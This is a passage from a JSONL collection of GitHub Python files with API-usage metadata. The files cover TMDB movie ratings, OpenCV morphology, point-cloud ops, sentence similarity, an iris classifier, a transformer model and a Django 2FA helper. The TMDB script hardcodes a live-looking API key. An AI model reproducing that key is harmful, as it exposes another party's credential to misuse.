"name"}, {"api_name": "numpy.arange", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 94, "usage_type": "call"}, {"api_name": "surv_copula.main_copula_survreg_gaussian.predict_copula_survival", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 96, "usage_type": "call"}, {"api_name": "jax.numpy.save", "line_number": 98, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 98, "usage_type": "name"}, {"api_name": "jax.numpy.save", "line_number": 99, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 99, "usage_type": "name"}]} +{"seq_id": "23266419315", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Sep 1 09:42:56 2018\r\n\r\n@author: A103932\r\n\"\"\"\r\nimport time\r\n\r\nstart = time.time()\r\n\r\n#import sys\r\n\r\napi_key = \"92e447debf2441468e90b59d45b39608\"#sys.argv[1]\r\n\r\n\"\"\"Finding 300 most popular comedy movies relaeased 2000 or later\"\"\"\r\n\r\nimport json\r\n\r\nimport http.client\r\n\r\nconn = http.client.HTTPSConnection(\"api.themoviedb.org\")\r\n\r\npayload = \"{}\"\r\n\r\nimport numpy as np\r\n\r\nimport pandas as pd\r\n\r\nmovie_data = pd.read_csv('movie_tmdb.csv')\r\n\r\nmovie_ids = 
list(movie_data['Tmdb_id'].unique())\r\n\r\nvote_average = []\r\n\r\nvote_count = []\r\n\r\npopularity = []\r\n\r\npage = 1 #count for pages\r\nreq = 1 #count for requests\r\n\r\nfor movie_id in movie_ids:\r\n    if req == 41:\r\n        time.sleep(10)\r\n        req = 1\r\n    url = \"/3/movie/\"+str(movie_id)+\"?language=en-US&api_key=\"+str(api_key)\r\n    conn.request(\"GET\", url, payload)\r\n    res = conn.getresponse()\r\n    data = res.read()\r\n    vote_average.append(json.loads(data)['vote_average'])\r\n    vote_count.append(json.loads(data)['vote_count'])\r\n    popularity.append(json.loads(data)['popularity'])\r\n    req += 1 \r\n\r\nmovie_details = pd.DataFrame({'movie_id':movie_ids, 'vote_average':vote_average, 'vote_count':vote_count,\r\n                              'popularity':popularity})\r\n\r\nend = time.time()\r\n\r\nprint('Start is : '+str(start)+', End is :'+str(end)+', Time taken:'+str(end-start))\r\n\r\n\r\n", "repo_name": "NarendraGadidasu/Movie_Recommendation_Engine", "sub_path": "Archive/tmdb_ratings.py", "file_name": "tmdb_ratings.py", "file_ext": "py", "file_size_in_byte": 1378, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "time.time", "line_number": 9, "usage_type": "call"}, {"api_name": "http.client.client.HTTPSConnection", "line_number": 21, "usage_type": "call"}, {"api_name": "http.client.client", "line_number": 21, "usage_type": "attribute"}, {"api_name": "http.client", "line_number": 21, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 29, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 44, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 50, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 51, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 52, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 55, "usage_type": "call"}, {"api_name": "time.time", "line_number": 58, "usage_type": "call"}]}
{"seq_id": "1551375313", "text": "# -*- coding: utf-8 -*-\r\nimport cv2\r\nimport numpy as np\r\n\r\ncap = cv2.VideoCapture('F:/python/image/vs_4.mp4')\r\n#cap =cv2.VideoCapture(0)\r\nwhile True:\r\n    _, frame = cap.read()\r\n    hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\r\n\r\n    #lower_red = np.array([150, 150, 50])\r\n    #upper_red = np.array([180, 255, 150])\r\n\r\n    lower_red = np.array([100, 43, 46])\r\n    upper_red = np.array([124, 255, 255])\r\n\r\n    mask = cv2.inRange(hsv, lower_red, upper_red)\r\n    #pixels below lower_red are set to 0\r\n    #pixels above upper_red are set to 0\r\n    #pixels inside the range are set to 255\r\n    res = cv2.bitwise_and(frame, frame, mask=mask)\r\n\r\n    kernel = np.ones((15,15), np.uint8)\r\n    erosion = cv2.erode(res,kernel)\r\n    dilation = cv2.dilate(erosion,kernel,iterations=1)\r\n    '''\r\nErosion: erosion eats away at object boundaries. The kernel slides over the image, and the center pixel keeps its value only if all pixels under the kernel are 1; otherwise it becomes 0. It is mainly used to remove white noise, and can also disconnect objects that are joined together.\r\n\r\nDilation: the center pixel becomes 1 if any pixel under the kernel is 1. When denoising, erode first and then dilate, because erosion also shrinks the object while removing white noise, so we dilate afterwards. It can of course also be used to separate two touching objects.\r\n————————————————\r\nCopyright notice: this is an original article by CSDN blogger “SongpingWang”, licensed under CC 4.0 BY-SA; please attach the original source link and this notice when reposting.\r\nOriginal link: https://blog.csdn.net/wsp_1138886114/article/details/82917661\r\n'''\r\n    opening = cv2.morphologyEx(mask,cv2.MORPH_OPEN,kernel) #erode then dilate: removes small blobs\r\n    closing = cv2.morphologyEx(mask,cv2.MORPH_CLOSE, kernel) #dilate then erode: fills small black holes\r\n\r\n    #cv2.imshow('frame', frame)\r\n    cv2.imshow('mask', mask)\r\n    #cv2.imshow('ero', erosion)\r\n    cv2.imshow('di', dilation)\r\n\r\n    cv2.imshow('opening',opening)\r\n    cv2.imshow('closing',closing)\r\n\r\n\r\n\r\n    if cv2.waitKey(1) & 0xFF == ord('q'):    # 
ord converts the character to its integer code\r\n                                          # waitKey(1) delays 1 ms before switching to the next frame\r\n                                          # 0 pauses the video\r\n                                          # 1000 delays too long and stutters\r\n        break\r\ncv2.destroyAllWindows()\r\ncap.release()", "repo_name": "Crystal-Dragon-Liu/ML_practise", "sub_path": "image_process_practise/t9_morphological transformation.py", "file_name": "t9_morphological transformation.py", "file_ext": "py", "file_size_in_byte": 2393, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.VideoCapture", "line_number": 5, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 9, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cv2.erode", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.dilate", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.morphologyEx", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.MORPH_OPEN", "line_number": 34, "usage_type": "attribute"}, {"api_name": "cv2.morphologyEx", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.MORPH_CLOSE", "line_number": 35, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 42, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 47, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 52, "usage_type": "call"}, {"api_name": "cv2.release", "line_number": 53, "usage_type": "call"}]}
{"seq_id": "41565961901", "text": "import torch\nfrom torch.autograd import Function\nfrom utils import knn_query_cuda, farthest_point_sampling_cuda  # assumed: the FPS kernel lives in the same utils module as knn_query_cuda\n\n\ndef knn_query(nsample, xyz, offset, new_xyz=None, new_offset=None):\n    \"\"\"\n    input: coords: (n, 3), new_xyz: (m, 3), offset: (b), new_offset: (b)\n    output: idx: (m, nsample) -1 is placeholder, dist2: (m, nsample)\n    \"\"\"\n    if new_xyz is None or new_offset is None:\n        new_xyz = xyz\n        new_offset = offset\n    assert xyz.is_contiguous() and new_xyz.is_contiguous()\n    m = new_xyz.shape[0]\n    idx = torch.cuda.IntTensor(m, nsample).zero_()\n    dist2 = torch.cuda.FloatTensor(m, nsample).zero_()\n    idx, dist2 = knn_query_cuda(m, nsample, xyz, new_xyz, offset.int(), new_offset.int(), idx, dist2)\n    return idx, torch.sqrt(dist2)\n\n\ndef grouping(idx,\n             feat,\n             xyz,\n             new_xyz=None,\n             with_xyz=False):\n    if new_xyz is None:\n        new_xyz = xyz\n    assert xyz.is_contiguous() and feat.is_contiguous()\n    m, nsample, c = idx.shape[0], idx.shape[1], feat.shape[1]\n    xyz = torch.cat([xyz, torch.zeros([1, 3]).to(xyz.device)], dim=0)\n    feat = torch.cat([feat, torch.zeros([1, c]).to(feat.device)], dim=0)\n    grouped_feat = feat[idx.view(-1).long(), :].view(m, nsample, c)  # (m, num_sample, c)\n\n    if with_xyz:\n        assert new_xyz.is_contiguous()\n        mask = torch.sign(idx + 1)\n        grouped_xyz = xyz[idx.view(-1).long(), :].view(m, nsample, 3) - new_xyz.unsqueeze(1)  # (m, num_sample, 3)\n        grouped_xyz = torch.einsum(\"n s c, n s -> n s c\", grouped_xyz, mask)  # (m, 
num_sample, 3)\n        return torch.cat((grouped_xyz, grouped_feat), -1)\n    else:\n        return grouped_feat\n\n\n\n\n\ndef interpolation(xyz, new_xyz, feat, offset, new_offset, k=3):\n    \"\"\"\n    input: coords: (m, 3), new_xyz: (n, 3), color: (m, c), offset: (b), new_offset: (b)\n    output: (n, c)\n    \"\"\"\n    assert xyz.is_contiguous() and new_xyz.is_contiguous() and feat.is_contiguous()\n    idx, dist = knn_query(k, xyz, offset, new_xyz, new_offset)  # (n, 3), (n, 3)\n    dist_recip = 1.0 / (dist + 1e-8)  # (n, 3)\n    norm = torch.sum(dist_recip, dim=1, keepdim=True)\n    weight = dist_recip / norm  # (n, 3)\n\n    new_feat = torch.cuda.FloatTensor(new_xyz.shape[0], feat.shape[1]).zero_()\n    for i in range(k):\n        new_feat += feat[idx[:, i].long(), :] * weight[:, i].unsqueeze(-1)\n    return new_feat\n\n\n\ndef knn_query_and_group(feat,\n                        xyz,\n                        offset=None,\n                        new_xyz=None,\n                        new_offset=None,\n                        idx=None,\n                        nsample=None,\n                        with_xyz=False\n                        ):\n    if idx is None:\n        assert nsample is not None\n        idx, _ = knn_query(nsample, xyz, offset, new_xyz, new_offset)\n    return grouping(idx, feat, xyz, new_xyz, with_xyz), idx\n\n\n\ndef farthest_point_sampling(xyz, offset, new_offset):\n    \"\"\"\n    input: coords: (n, 3), offset: (b), new_offset: (b)\n    output: idx: (m)\n    \"\"\"\n    assert xyz.is_contiguous()\n    n, b, n_max = xyz.shape[0], offset.shape[0], offset[0]\n    for i in range(1, b):\n        n_max = max(offset[i] - offset[i - 1], n_max)\n    idx = torch.cuda.IntTensor(new_offset[b - 1].item()).zero_()\n    tmp = torch.cuda.FloatTensor(n).fill_(1e10)\n    farthest_point_sampling_cuda(b, n_max, xyz, offset.int(), new_offset.int(), tmp, idx)\n    del tmp\n    return idx", "repo_name": "xamwise/PT-segmentation", "sub_path": "models/Zhao/trials/pointops.py", "file_name": "pointops.py", "file_ext": "py", "file_size_in_byte": 3454, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.cuda.IntTensor", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 16, "usage_type": "attribute"}, {"api_name": "torch.cuda.FloatTensor", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 17, "usage_type": "attribute"}, {"api_name": "utils.knn_query_cuda", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.sign", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.einsum", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.cuda.FloatTensor", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 59, "usage_type": "attribute"}, {"api_name": "torch.cuda.IntTensor", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 91, "usage_type": "attribute"}, {"api_name": "torch.cuda.FloatTensor", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 92, "usage_type": "attribute"}]}
{"seq_id": "28495063598", "text": "import numpy as np \nimport nltk\nfrom random import randint\nimport torch\nfrom models import InferSent\nfrom sklearn.metrics.pairwise import 
cosine_similarity\n\ndef Infersent(document1,document2):\n\n    MODEL_PATH = \"infersent1.pkl\"\n    params_model = {'bsize': 64, 'word_emb_dim': 300, 'enc_lstm_dim': 2048,\n                'pool_type': 'max', 'dpout_model': 0.0, 'version': 1}\n    model = InferSent(params_model)\n    model.load_state_dict(torch.load(MODEL_PATH))\n    \n    use_cuda = False\n    model = model.cuda() if use_cuda else model\n    W2V_PATH = 'glove/glove.6B.300d.txt'\n    model.set_w2v_path(W2V_PATH)\n    \n    model.build_vocab_k_words(K=100000)\n    \n    sentences=[document1,document2]\n    embeddings = model.encode(sentences, bsize=128, tokenize=False, verbose=True)\n    score=cosine_similarity(embeddings[0].reshape(1,-1),embeddings[1].reshape(1,-1))  # row vectors: one sample per row\n    return str(np.mean(score))\n\n    ", "repo_name": "raunaknegi/similarity-checker", "sub_path": "api/infersent.py", "file_name": "infersent.py", "file_ext": "py", "file_size_in_byte": 899, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "models.InferSent", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 14, "usage_type": "call"}, {"api_name": "sklearn.metrics.pairwise.cosine_similarity", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 26, "usage_type": "call"}]}
{"seq_id": "33534450600", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[42]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n# In[43]:\n\n\nsns.get_dataset_names()\n\n\n# In[44]:\n\n\niris=sns.load_dataset('iris')\n\n\n# In[45]:\n\n\niris.head()\n\n\n# In[46]:\n\n\niris.describe()\n\n\n# In[47]:\n\n\niris.value_counts()\n\n\n# In[48]:\n\n\niris['sepal_length'].nunique()\n\n\n# In[49]:\n\n\niris['petal_length'].nunique()\n\n\n# In[50]:\n\n\niris['species'].nunique()\n\n\n# In[51]:\n\n\niris=iris[['sepal_length','petal_length','species']]\n\niris.head()\n\n\n# In[52]:\n\n\niris['species'].value_counts()\n\n\n# In[53]:\n\n\niris.isnull().sum()\n\n\n# In[54]:\n\n\nsns.pairplot(iris,hue='species')\n\n\n# In[55]:\n\n\nfrom sklearn.preprocessing import LabelEncoder\nmodel = LabelEncoder()\n\n\n# In[56]:\n\n\niris['species'] = model.fit_transform(iris['species'])\n\n\n# In[57]:\n\n\niris.head()\n\n\n# In[58]:\n\n\nfrom sklearn.model_selection import train_test_split\n\n\n# In[59]:\n\n\nx_train,x_test,y_train,y_test=train_test_split(iris.drop(columns=['species']),iris['species'], test_size=0.3)\nx_train.shape,x_test.shape\n\n\n# In[60]:\n\n\nfrom sklearn.linear_model import 
LogisticRegression\nmodel=LogisticRegression()\nmodel.fit(x_train,y_train)\n\n\n# In[61]:\n\n\nfrom sklearn.metrics import accuracy_score\npred=model.predict(x_test)\naccuracy_score(y_test,pred)\n\n\n# In[62]:\n\n\nfrom sklearn.neighbors import KNeighborsClassifier\nmodel=KNeighborsClassifier()\n\n\n# In[63]:\n\n\nmodel.fit(x_train,y_train)\n\n\n# In[64]:\n\n\npred1=model.predict(x_test)\naccuracy_score(y_test,pred1)\n\n\n# In[65]:\n\n\nfrom sklearn.tree import DecisionTreeClassifier\ndef training_model():\n model=DecisionTreeClassifier()\n trained_model = model.fit(x_train,y_train)\n return trained_model\n\n\n# In[66]:\n\n\npred2=model.predict(x_test)\naccuracy_score(y_test,pred2)*100\n\n\n# In[67]:\n\n\npred2\n\n\n# In[68]:\n\n\nx_test.head()\n\n\n# In[69]:\n\n\nimport pickle\n\n\n# In[70]:\n\n\npickle.dump(model,open('model.pkl', 'wb'))\n\n\n# In[71]:\n\n\nload_model=pickle.load(open('model.pkl','rb'))\n\n\n# In[72]:\n\n\nload_model.predict([[7.7,6.9]])\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n", "repo_name": "githubcodingjoiner/IRIS_SPECIES_CLASSIFIER", "sub_path": "iris.py", "file_name": "iris.py", "file_ext": "py", "file_size_in_byte": 2036, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "seaborn.get_dataset_names", "line_number": 16, "usage_type": "call"}, {"api_name": "seaborn.load_dataset", "line_number": 22, "usage_type": "call"}, {"api_name": "seaborn.pairplot", "line_number": 84, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 91, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 115, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 123, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 132, "usage_type": "call"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 139, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 152, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 160, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 169, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 193, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 199, "usage_type": "call"}]} +{"seq_id": "22067257577", "text": "import torch\r\nimport torch.nn as nn\r\nimport torch.nn.init as init\r\nimport torch.optim as optim\r\nimport math\r\n\r\n\r\n\r\nclass PositionalEncoding(nn.Module):\r\n\r\n def __init__(self, d_model, dropout=0.1, max_len=5000):\r\n super(PositionalEncoding, self).__init__()\r\n self.dropout = nn.Dropout(p=dropout)\r\n\r\n pe = torch.zeros(max_len, d_model)\r\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\r\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.log(10000.0) / d_model))\r\n pe[:, 0::2] = torch.sin(position * div_term)\r\n pe[:, 1::2] = torch.cos(position * div_term)\r\n pe = pe.unsqueeze(0).transpose(0, 1)\r\n self.register_buffer('pe', pe)\r\n\r\n def forward(self, x):\r\n x = x + self.pe[:x.size(0), :]\r\n return self.dropout(x)\r\n\r\n\r\nclass TransformerModel(nn.Module):\r\n\r\n def __init__(self, ntoken, ninp, nhead, nhid, nlayers, device,dropout=0.5):\r\n super(TransformerModel, self).__init__()\r\n from torch.nn import TransformerEncoder, TransformerEncoderLayer\r\n self.model_type = 
'Transformer'\r\n self.pos_encoder = PositionalEncoding(ninp, dropout).to(device)\r\n encoder_layers = TransformerEncoderLayer(ninp, nhead, nhid, dropout).to(device)\r\n self.transformer_encoder = TransformerEncoder(encoder_layers, nlayers).to(device)\r\n self.encoder = nn.Embedding(ntoken, ninp).to(device)\r\n self.ninp = ninp\r\n print(ntoken*ninp)\r\n self.decoder = nn.Linear(ntoken*ninp, 2).to(device)\r\n self.device= device\r\n self.sigmoid= nn.Sigmoid().to(device)\r\n\r\n self.init_weights()\r\n\r\n def generate_square_subsequent_mask(self, sz):\r\n mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)\r\n mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))\r\n return mask.to(self.device)\r\n\r\n def init_weights(self):\r\n initrange = 0.1\r\n self.encoder.weight.data.uniform_(-initrange, initrange)\r\n self.decoder.bias.data.zero_()\r\n self.decoder.weight.data.uniform_(-initrange, initrange)\r\n\r\n def forward(self, src, src_mask):\r\n # src = self.encoder(src) * math.sqrt(self.ninp)\r\n inp=src\r\n src= src.to(self.device)\r\n self.pos_encoder= self.pos_encoder.to(self.device)\r\n src = self.pos_encoder(src)\r\n output = self.transformer_encoder(src, src_mask)\r\n output= output.view(inp.shape[0],-1)\r\n # print(output.shape)\r\n # print(output.shape)\r\n output = self.decoder(output)\r\n output =self.sigmoid(output)\r\n return output\r\n# i am not passing positional encoding\r\nif __name__==\"__main__\":\r\n\r\n ntokens = 50 # the size of vocabulary\r\n emsize = 1024 # embedding dimension\r\n nhid = 1024 # the dimension of the feedforward network model in nn.TransformerEncoder\r\n nlayers = 2 # the number of nn.TransformerEncoderLayer in nn.TransformerEncoder\r\n nhead = 2 # the number of heads in the multiheadattention models\r\n dropout = 0.2 # the dropout value\r\n device=torch.device(\"cpu\")\r\n model = TransformerModel(ntokens, emsize, nhead, nhid, nlayers, device,dropout)\r\n\r\n src = torch.rand((10, 50, 1024))\r\n tgt = torch.rand((20, 50, 1024))\r\n src_mask = model.generate_square_subsequent_mask(src.size(0))\r\n output = model(src, src_mask)\r\n print(output.shape)\r\n", "repo_name": "gulzainali98/pytorch-reinforce", "sub_path": "transformer_discriminator.py", "file_name": "transformer_discriminator.py", "file_ext": "py", "file_size_in_byte": 3420, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 9, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 9, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 16, "usage_type": "attribute"}, {"api_name": "torch.exp", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 17, "usage_type": "call"}, {"api_name": "math.log", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.sin", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.cos", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 28, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.nn.TransformerEncoderLayer", "line_number": 35, "usage_type": 
"call"}, {"api_name": "torch.nn.TransformerEncoder", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.nn.Embedding", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 37, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "name"}, {"api_name": "torch.triu", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 79, "usage_type": "call"}, {"api_name": "{'TransformerEncoder': 'torch.nn.TransformerEncoder', 'TransformerEncoderLayer': 'torch.nn.TransformerEncoderLayer'}", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "31158263309", "text": "import sys, re, math\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport subprocess\n\n#############\n#Subroutines#\n#############\n\ndef get_stem_lengths(tabbed_struc_file):\n mod_stem_lengths = []\n orig_stem_lengths = []\n stem_length_differences = []\n with open(tabbed_struc_file, 'r') as F:\n for line in F:\n if not line.startswith(\"#\"):\n rna_id,seq,mod_struc,orig_struc = line.strip().split('\\t')\n if seq is not None:\n orig_stem_length = min(orig_struc.count('('), orig_struc.count(')'))\n mod_stem_length = min(mod_struc.count('('), mod_struc.count(')'))\n mod_stem_lengths.append(mod_stem_length)\n orig_stem_lengths.append(orig_stem_length)\n stem_length_differences.append((mod_stem_length-orig_stem_length)/orig_stem_length)\n F.close()\n return mod_stem_lengths, orig_stem_lengths,stem_length_differences\n\n######\n#Main#\n######\n\nusage = \"usage: \" + sys.argv[0] + \" <T1000 hairpin tabbed structure file> <control hairpin tabbed structure file> <scatterplot filename>\"\nif len(sys.argv) != 4:\n print(usage)\n sys.exit()\n\nT1000_struc_file = sys.argv[1]\ncontrol_struc_file = sys.argv[2]\nfigure_file = sys.argv[3]\n\nmod_T1000_stem_lengths, orig_T1000_stem_lengths,T1000_stem_change = get_stem_lengths(T1000_struc_file)\nmod_control_stem_lengths, orig_control_stem_lengths,control_stem_change = get_stem_lengths(control_struc_file)\n\n\n\nmplot = plt.figure()\nvplot = plt.violinplot([control_stem_change,T1000_stem_change])\n#plt.ylabel(\"Fractional change in stem length after random insertion\")\ncolors = [\"#92c5de\", \"#ca0020\"]\nfor patch,color in zip(vplot['bodies'], colors):\n patch.set_facecolor(color)\n\nmplot.set_figwidth(3)\nmplot.set_figheight(3)\n#plt.scatter(orig_control_stem_lengths, mod_control_stem_lengths,s=5,color = \"#ca0020\")\n#plt.scatter(orig_T1000_stem_lengths, mod_T1000_stem_lengths,s=5,color = \"#92c5de\")\n#plt.xlabel('Stem Length of Hairpin before Deletion')\n#plt.ylabel('Stem Length of Hairpin after Deletion')\nplt.savefig(figure_file)\n", "repo_name": "alyssapratt/unbreakable-hairpins", "sub_path": "Graphs and statistical tests/plot_stem_length_change.py", "file_name": "plot_stem_length_change.py", "file_ext": "py", "file_size_in_byte": 2137, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.use", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.argv", 
"line_number": 32, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 33, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 35, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 37, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 38, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 39, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.violinplot", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}]} +{"seq_id": "73639137126", "text": "import logging\nfrom j2fa.models import TwoFactorSession\nfrom django.conf import settings\nfrom ipware.ip import get_client_ip # type: ignore # pytype: disable=import-error\nfrom django.http import HttpRequest\n\nlogger = logging.getLogger(__name__)\n\n\ndef auth_2fa(request: HttpRequest, user, reason: str = \"\"):\n \"\"\"\n By-pass 2FA requirement for this user session.\n Call auth.login() before this function if the user is not logged in yet.\n :param request:\n :param user:\n :param reason: Optional reason for by-passing 2FA, e.g. \"bank ID\". Just stored in log.\n :return:\n \"\"\"\n ip = get_client_ip(request)[0]\n if ip is None and settings.DEBUG:\n ip = \"127.0.0.1\"\n user_agent = request.META[\"HTTP_USER_AGENT\"]\n ses = TwoFactorSession.objects.create(\n user=user,\n ip=ip,\n user_agent=user_agent[:512],\n phone=\"\",\n email=user.email,\n code=\"\",\n )\n assert isinstance(ses, TwoFactorSession)\n request.session[\"j2fa_session\"] = ses.id\n ses.activate()\n logger.info(\"User %s (IP %s) 2FA requirement by-passed (reason: %s)\", user, ip, reason)\n", "repo_name": "kajala/django-j2fa", "sub_path": "j2fa/services.py", "file_name": "services.py", "file_ext": "py", "file_size_in_byte": 1123, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "django.http.HttpRequest", "line_number": 10, "usage_type": "name"}, {"api_name": "ipware.ip.get_client_ip", "line_number": 19, "usage_type": "call"}, {"api_name": "django.conf.settings.DEBUG", "line_number": 20, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 20, "usage_type": "name"}, {"api_name": "j2fa.models.TwoFactorSession.objects.create", "line_number": 23, "usage_type": "call"}, {"api_name": "j2fa.models.TwoFactorSession.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "j2fa.models.TwoFactorSession", "line_number": 23, "usage_type": "name"}, {"api_name": "j2fa.models.TwoFactorSession", "line_number": 31, "usage_type": "argument"}]} +{"seq_id": "4298236535", "text": "import cv2\nimport numpy as np\n\ncap = 